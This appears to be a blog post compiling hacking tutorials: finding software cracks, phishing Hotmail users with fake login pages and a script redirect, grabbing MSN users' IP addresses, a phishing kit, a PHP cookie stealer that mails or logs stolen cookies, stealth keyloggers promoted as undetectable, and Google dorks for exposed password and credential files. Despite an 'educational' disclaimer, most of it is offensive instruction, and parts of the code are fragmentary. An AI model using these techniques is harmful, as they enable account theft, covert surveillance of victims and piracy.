Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....
But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....
So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss
Just follow the steps as instructed below
1) Go to http://www.google.com
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it
Now you receive Many pages which contains Serial no, Crack, Patches....
Just make a try, this simple trick works for many people
HACKING HOTMAIL
Introduction
We all use Hotmail!!!well its one of my Favorites.
Here m going to reveal n Alert About how the Unethical Hackers Can cheat us.
This Page is meant for Educational Purpose only. I do not Endorse Hacking at all but its Meant for knowing the Threats n Protect yourself also Curbing them
Topics
1:- How hotmail can be hacked with fake login screen (2 different ways)
2:- Fake e-mails threats
3:- Detect a fake message into hotmail
4:- How to get persons ip address through msn messenger
5:- curbing the way hackers get the passwords
6:- Easiest Way
7:- Change msn messenger title
8:- Protect yourself from Virus
9:- Hoax Toolbox v1.1
1) Protect yourself from Phishing
Usually The Unethical Hackers Upload their hotmail's fake login screen on a web server and then send these codes
to the victim from yahoo or another mail sending program. The codes are
script>
location.href="http://www.yoursite.com/yourhotmailfakepage.html\/"
< /script>
and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r Hacked.
Beware of There Threats
2) Beware of Fake Login Screens
They Start chatting with your victim and send him the fake login screen through Their messenger and try to pish you.
there are many many of them available on the net.. which are usually small Visual Basic programs.. never reveal your password anywhere other than the latest Versions of msn Messengers.
3) Fake e-mails threats
This is very easy go to http://www.boxfrog.com/ register( its blocked now) but there are many others .. google u ll find many click on create message and in from filed type in any ones e-mail address and the message will be sent.
there's also a simple way of doing this by Telnet ting from the dos Prompt.
Beware of this Threat .. make your spam protection Powerful
4) Detect a fake message into Hotmail inbox
This is Simple Buddies.. open your e-mail box go to options select display setting or message display setting or (some thing like this) now select full where it says message display settings or something like this. Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of program it will tell u his ip. n once you know D ip m sure u know how to go between it there after
IMP: Read the ip address log from Backwards.
5) Protect urself revealing your ip address through msn messenger
When you Open your messenger start chatting with friend open ms dos and type netstat -n there do not press enter and then minimize it after this send something to your victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize your MS-DOS and
press enter the ip address next to time wait: will the friends ip. U may be Hacked The same way
Beware!!
HoaX Toolbox v1.1
This is a PHP script that creates a website with an admin area that allows the user to choose between fake login pages of MSN Messenger, Hotmail, Yahoo and Google Mail, once you set up the script on a server that has PHP and SQL you will be able to log in the administration page and choose the fake login page to display to the main site, when the victim tries to log-in their mail/messenger, the website keeps the user/pass information in a log file that you can view anytime from the admin area, if the victim is not stupid enough to add their real log-in because they read the URL of your server instead of reading hotmail.com or yahoo.com in the URL bar then remember you can pop-up the main page of the site and disable the URL bar on the explorer, so when the user clicks on your real site the link "Yahoo Mail" an explorer without URL bar pops up, if you don't know how to pop up customized browsers search google
Hacking MSN
Small yet working trick
Hacking MSN is actually VERY simple. Msn is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.
If u receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will receive a clear IP.
Once u have d IP u can do anything with him by Fingerprinting.
U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail(" me@mydomain.com me@mydomain.com ", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to " me@mydomain.com me@mydomain.com " with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.
Writing software applications for keylogging is trivial, and like any computer program can be distributed as a trojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.
lets see some of the key logger's what I known
Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.
XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.{Windows 95, NT4, 98, Me, 2000, XP}
Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.
Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.
Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager!
SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.[Download]
Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible Specify log file location Uses a WH_JOURNALRECORD hooking procedure to capture everything typed Hide and unhide the interface by pressing Ctrl+Shift+F7
Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is an stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.
Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.
All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!
The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.
Google search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.
Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.
Google’s Advanced Search Query Syntax
Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.
[ intitle: ]
The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.
intitle: login password
will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.
Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.
intitle: login intitle: password
is same as
allintitle: login password
[ inurl: ]
The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.
Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.
allinurl: etc/passwd
will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.
[ site: ]
The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.
exploits site:hackingspirits.com
will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.
[ filetype: ]
This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).
filetype:doc site:gov confidential
will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.
[ link: ]
“link:” syntax will list down webpages that have links to the specified webpage.
link:www.expertsforge.com
will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.
[ related: ]
The “related:” will list web pages that are "similar" to a specified
web page.
related:www.expertsforge.com
will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.
[ cache: ]
The query “cache:” will show the version of the web page that Google
has in its cache.
cache:www.hackingspirits.com
will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.
If you include other words in the query, Google will highlight those words within the cached document.
cache:www.hackingspirits.com guest
will show the cached content with the word "guest" highlighted.
[ intext: ]
The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.
intext:exploits
will return only links to those web pages that has the search keyword "exploits" in its webpage.
[ phonebook: ]
“phonebook” searches for
phonebook:Lisa+CA
will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.
Google Hacks
Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.
Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.
Index Of
Using “Index of ” syntax to find sites enabled with Index browsing
A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
Looking for vulnerable sites or servers using “inurl:” or “allinurl:”
a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.
b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:
http://www.securiteam.com/exploits/2BUQ4S0SAW.html
c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.
d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.
For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html
Other similar search using “inurl:” or “allinurl:” combined with other syntax
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
Looking for vulnerable sites or servers using “intitle:” or “allintitle:”
a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.
b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.
Other similar search using “intitle:” or “allintitle:” combined with other syntax
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
No comments:
Post a Comment